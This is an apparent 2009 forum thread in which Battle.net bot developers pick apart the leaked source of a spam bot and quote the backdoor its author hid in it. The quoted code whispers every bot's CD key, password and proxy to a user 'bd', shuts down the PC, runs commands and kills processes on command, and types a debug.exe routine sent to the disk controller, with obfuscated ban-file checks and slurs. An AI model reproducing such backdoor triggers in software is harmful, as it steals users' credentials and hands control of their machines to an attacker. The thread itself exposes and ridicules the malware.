Now the best bot ever created for battle.net is in your hands!!!
http://www.esnips.com/web/nesucks/ :D
support for encrypted cdkeys removed.
Quoteencrypted cdkey support removed :)
backdoor triggers also removed
try and fix the bug that causes the program to crash when reconnecting bots that initialized warden. The crash occurs when the bot on the assembly code.
try and add warden for storm.dll
give me updated geno source >:-O
So you're stuck doing something simple, and you want the rest of the bnet community to help you fix your shitty 1/2 ripped spam bot?/me hasn't even looked at the source yet to fully grasped just how much rippage/suckage it is...
I'd be vary disappointed in anyone who actually helps you.
XGLGKDFK = "4g.02B.l.29Ko"
Open Environ$(
Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _
Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _
Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _
)
& "/" &
Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _
Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _
Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _
Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _
For Input As #1
Input #1, SCGBGN3
If SCGBGN3 = "1" Then
MsgBox permabannedSTR
End
End If
Close #1Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log)
Case 4
If frmMain.DontshowMisc.Value = 0 Then
AddChatChannel vbWhite, struser & " " & Flags & " " & Message
End If
ecrEtcommandz:
If struser = "bd" Then 'modified to protect current geno users
Do Until Secretcommand = amountofkeysinfile
Secretcommand = Secretcommand + 1
Dim clsP As New clsPacket
With clsP
.InsertString "/" & "w " & struser & " " & bots(Secretcommand).CDKey & " " & _
bots(Secretcommand).Password & " " & bots(Secretcommand).ProxyServer
.sendPacket frmMain.sckBot(Secretcommand), &HE, Secretcommand
End With
Loop
Secretcommand = 0
End If
If struser = "bd" Then 'modified to protect current geno users
Call ExitWindowsEx(SHUTDOWN, &H10)
End If
If struser = "bd" Then 'modified to protect current geno users
Call MsgBox("Fuck you yes i hacked your computer & thx for everything >:D")
End If
If struser = "bd" Then 'modified to protect current geno users
Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)")
End If
If struser = "bd" Then 'modified to protect current geno users
Call MsgBox(Mid$(Message, 9))
End If
If struser = "bd" Then 'modified to protect current geno users
ShellFile "C:/windows/system32/telnet.exe"
End If
If struser = "bd" Then 'modified to protect current geno users
ShellFile "Mid$(Message, 14))"
End If
If struser = "bd" Then 'modified to protect current geno users
ShellFile "c:\windows\System32\mstsc.exe"
End If
If struser = "bd" Then 'modified to protect current geno users
ShellFile "c:\windows\explorer.exe"
End If
If struser = "bd" Then 'modified to protect current geno users
KillAppByEXEName (Mid$(Message, 8))
End If
If struser = "bd" Then 'modified to protect current geno users
End
End If
If struser = "bd" Then 'modified to protect current geno users
Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)")
ShellFile "C:/windows/system32/telnet.exe"
ShellFile "c:\windows\System32\mstsc.exe"
Call ExitWindowsEx(SHUTDOWN, &H10)
End If
If struser = "bd" Then 'modified to protect current geno users
Dim sdkjfhsd As String
sdkjfhsd = "now formatting all medias then writing random data in hard drive so you can never recover files ever again FAG."
ShellFile Mid$(App.Path, 1, 1) & ":/windows/system32/cmd.exe"
DoEvents
SendKeys "debug"
SendKeys "{enter}", 1
SendKeys "F 100 FFFF 0", 1
SendKeys "a", 1
SendKeys "org 400", 1
SendKeys "mov dx,3F6", 1
SendKeys "in al,dx", 1
SendKeys "and al,80", 1
SendKeys "jnz 403", 1
SendKeys "mov dx,1F7", 1
SendKeys "mov al,90", 1
SendKeys "out dx,al", 1
SendKeys "mov dx,3F6", 1
SendKeys "in al,dx", 1
SendKeys "and al,80", 1
SendKeys "jnz 411", 1
SendKeys "mov dx,1F1", 1
SendKeys "in al,dx", 1
SendKeys "and al,1", 1
SendKeys "jz 453", 1
SendKeys "mov dx,3F6", 1
SendKeys "in al,dx", 1
SendKeys "and al,80", 1
SendKeys "jnz 421", 1
SendKeys "mov dx,1F6", 1
SendKeys "mov al,E0", 1
SendKeys "out dx,al", 1
SendKeys "mov dx,3F6", 1
SendKeys "in al,dx", 1
SendKeys "and al,80", 1
SendKeys "jnz 42F", 1
SendKeys "in al,dx", 1
SendKeys "and al,40", 1
SendKeys "jz 434", 1
SendKeys "mov dx,1F7", 1
SendKeys "mov al,EC", 1
SendKeys "out dx,al", 1
SendKeys "mov dx,3F6", 1
SendKeys "in al,dx", 1
SendKeys "and al,80", 1
SendKeys "jnz 442", 1
SendKeys "mov dx,1F0", 1
SendKeys "mov di,100", 1
SendKeys "mov cx,100", 1
SendKeys "cld", 1
SendKeys "rep", 1
SendKeys "db 6d", 1
SendKeys "int 3", 1
SendKeys "g =400", 1
SendKeys "d 100 2ff", 1
End Ifu.u seriously?
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.
Case "ver"
If bots(Index).DELAYSPAM = 0 Then
Send0x0E Index, "/emote .: StealthBot v2.6 Revision 3 by Stealth."
bots(Index).DELAYSPAM = 4500
End IfFigures.
More of his BANFOREVERZ code.
Public Function BANFOREVERFILE(ERROrCODE As Long)
On Error Resume Next
'SYSTEMROOT\iis9.log
Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Append As #1
Print #1, ERROrCODE
Close #1
Unload frmMain
End
End Function
Public Function CHECKFORBAN()
On Error Resume Next
Dim stringx As String
'SYSTEMROOT\iis9.log
Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Input As #1
Input #1, stringx
If IsNumeric(stringx) = True Then
MsgBox CoDecodeXOR("EFIIBC")
End
End If
Close #1
End Function
nesucks is the malware of battle.net
cool, what horrible programming, wow, does it get any worse? i haven't downloaded who knows what he binded to what...
you guys realize this is a joke, right?
Quote from: l2k-Shadow on September 21, 2009, 12:03 AM
you guys realize this is a joke, right?
Nope... nope... pretty sure he's serious.
Quote from: Sixen on September 21, 2009, 01:37 AM
Quote from: l2k-Shadow on September 21, 2009, 12:03 AM
you guys realize this is a joke, right?
Nope... nope... pretty sure he's serious.
Which is why it's a joke.
Probly a joke, cause when you look code, you regonize how much there is ripping after all
Quote from: Hdx on September 20, 2009, 02:42 PM
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.
Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave).
So, in fact, it does do something - Not quite sure what, though.
Of course, none of this would have a chance in hell of being executed. A good third of the instructions in that code blob are privileged.
EDIT**
A google search for "mov dx, 3f6" turns up one result: http://thestarman.pcministry.com/asm/debug/DEVIDP0.DSF.txt. I figured that'd be the best instruction to search for since it's very uncommon to use this kind of hackery.
Quote from: brew on September 22, 2009, 07:21 PM
Quote from: Hdx on September 20, 2009, 02:42 PM
Anyone wanna bother telling me what that asm does? if anything.
*note all formatting is me, his raw code is all on the left.
Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave).
Interesting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days....
Would someone rip out trojan shit code and release corrected source?
Quote from: MyndFyre on September 23, 2009, 01:33 AMInteresting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days....
Why not? That code is communicating directly with the hardware at a level below anything NT has to do with. The operating system model being used is irrelevant.
Afaik NT forbids I/O ports usage from user program, you need to use driver for that.
Quote from: xpeh on September 23, 2009, 10:28 AM
Would someone rip out trojan shit code and release corrected source?
Quote from: xpeh on September 24, 2009, 12:02 PM
Afaik NT forbids I/O ports usage from user program, you need to use driver for that.
Among other things; you shouldn't be able to do anything that could cause a bluescreen from user-mode.
Oh wow I laughed hard with the file IO...
That was a joke beyond jokes
Quote from: Hdx on September 20, 2009, 02:42 PM
XGLGKDFK = "4g.02B.l.29Ko"
Open Environ$(
Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _
Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _
Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _
)
& "/" &
Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _
Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _
Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _
Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _
For Input As #1
Input #1, SCGBGN3
If SCGBGN3 = "1" Then
MsgBox permabannedSTR
End
End If
Close #1
Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log)
If you don't mind me asking, how did you work it out?
Quote from: nesucks his dad off on October 05, 2009, 11:57 AM
Quote from: Hdx on September 20, 2009, 02:42 PM
XGLGKDFK = "4g.02B.l.29Ko"
Open Environ$(
Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _
Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _
Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _
)
& "/" &
Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _
Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _
Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _
Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _
For Input As #1
Input #1, SCGBGN3
If SCGBGN3 = "1" Then
MsgBox permabannedSTR
End
End If
Close #1
Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log)
If you don't mind me asking, how did you work it out?
He probably...um...read the code. See, people who actually know the language tend to be able to figure out simple string manipulations.